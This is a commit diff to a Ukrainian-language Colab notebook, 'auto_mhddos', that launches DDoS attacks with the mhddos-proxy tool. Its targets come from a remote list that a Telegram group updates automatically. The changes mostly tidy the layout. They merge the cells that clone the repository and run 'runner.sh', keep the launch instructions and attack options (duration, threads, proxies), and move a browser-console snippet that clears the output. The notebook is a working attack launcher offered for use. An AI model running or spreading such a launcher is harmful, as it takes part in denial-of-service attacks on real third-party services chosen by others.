more mobile-friendly ui

--- a/auto_mhddos.ipynb
+++ b/auto_mhddos.ipynb
@@ -20,10 +20,12 @@
   {
    "cell_type": "markdown",
    "source": [
-    "###### Цей скрипт використовує [mhddos-proxy](https://github.com/porthole-ascend-cinnamon/mhddos_proxy) для атаки цілей [з цього списку](https://raw.githubusercontent.com/Aruiem234/auto_mhddos/main/runner_targets). Цілі підбираються та оновлюються автоматично телеграм групою [Український Жнець](https://t.me/ukrainian_reaper_ddos). Весь код має вільний доступ та викладено [тут](https://github.com/white-sagittarius/auto_mhddos). Слава Україні!\n",
+    "###### Цей скрипт використовує [mhddos-proxy](https://github.com/porthole-ascend-cinnamon/mhddos_proxy) для атаки цілей [з цього списку](https://raw.githubusercontent.com/Aruiem234/auto_mhddos/main/runner_targets).\n",
+    "###### Цілі підбираються та оновлюються автоматично телеграм групою [Український Жнець](https://t.me/ukrainian_reaper_ddos).\n",
+    "###### Весь код має вільний доступ та викладено [тут](https://github.com/white-sagittarius/auto_mhddos). Слава Україні!\n",
     "---\n",
-    "\n",
-    "### <strong>Запуск</strong>: меню \"Runtime\" -> \"Run all\". <strong>Зупинка або рестарт</strong> -> меню \"Runtime\" -> \"Manage sessions\" -> \"Terminate\"\n",
+    "#### <strong>Запуск</strong>: меню Runtime -> Run all\n",
+    "#### <strong>Зупинка або рестарт</strong> -> Runtime -> Manage sessions -> Terminate\n",
     "##### (якщо ви не бачите меню вгорі, вимкніть AdBlock)\n",
     "---"
    ],
@@ -36,40 +38,14 @@
   },
   {
    "cell_type": "code",
-   "source": [
-    "%%capture\n",
-    "%cd ~\n",
-    "%rm -rf auto_mhddos\n",
-    "!git clone https://github.com/white-sagittarius/auto_mhddos.git\n",
-    "%cd ~/auto_mhddos"
-   ],
-   "metadata": {
-    "id": "iwL1D0yQ2Y5X",
-    "pycharm": {
-     "name": "#%%\n"
-    }
-   },
-   "execution_count": null,
-   "outputs": []
-  },
-  {
-   "cell_type": "markdown",
-   "source": [
-    "### <strong>Поточний стан атаки</strong> відображатиметься за кілька хвилин після запуску\n",
-    "##### Формат: [час, розбіжність 3 години] -> вхідна швидкість ↓MBit/s↓ -> вихідна швидкість ↑MBit/s↑"
-   ],
-   "metadata": {
-    "id": "9ZHLG9gfB0eK",
-    "pycharm": {
-     "name": "#%% md\n"
-    }
-   }
-  },
-  {
-   "cell_type": "code",
    "execution_count": null,
    "outputs": [],
    "source": [
+    "#@title Результати атаки (якщо оновлюється кожні ~2 хвилини -> все ОК): { display-mode: \"form\" }\n",
+    "%cd ~\n",
+    "%rm -rf auto_mhddos &> /dev/null\n",
+    "!git clone https://github.com/white-sagittarius/auto_mhddos.git &> /dev/null\n",
+    "%cd ~/auto_mhddos\n",
     "!bash runner.sh"
    ],
    "metadata": {
@@ -82,6 +58,17 @@
   {
    "cell_type": "markdown",
    "source": [
+    "<details>\n",
+    "  <summary>Опціонально: нажміть для інструкції з <strong>автоматичної очистки виводу на екран</strong></summary>\n",
+    "\n",
+    "     - виведіть консоль вашого браузера; зазвичай, вона визивається клавішею F12\n",
+    "     - переконайтесь, що фокус стоїть на вкладці Console\n",
+    "     - введіть текст нижче та нажміть ентер\n",
+    "     - function ClearOutput(){ document.querySelector(\"iron-icon[command = 'clear-focused-or-selected-outputs']\").click() } setInterval(ClearOutput,300000)\n",
+    "     - кожні 5 хвилин вивід результатів буде очищено; консоль браузера можна закривати\n",
+    "\n",
+    "</details>\n",
+    "\n",
     "<details>\n",
     "  <summary>Опціонально: нажміть для додаткових параметрів запуску</summary>\n",
     "\n",
@@ -115,10 +102,7 @@
     "    !bash runner.sh -r 3h -t 1000 -p 1 -s 10\n",
     "\n",
     "    Long and short options can be mixed in a single command. Order of options does not matter. No options are required.\n",
-    "</details>\n",
-    "\n",
-    "##### Опціонально: для *автоматичної очистки виводу на екран кожні 10 хвилин*, вставте у консоль браузера (визивається через F12) та нажміть ентер:\n",
-    "`function ClearOutput(){ document.querySelector(\"iron-icon[command = 'clear-focused-or-selected-outputs']\").click() } setInterval(ClearOutput,600000)`"
+    "</details>"
    ],
    "metadata": {
     "id": "5R0oboScD87x",
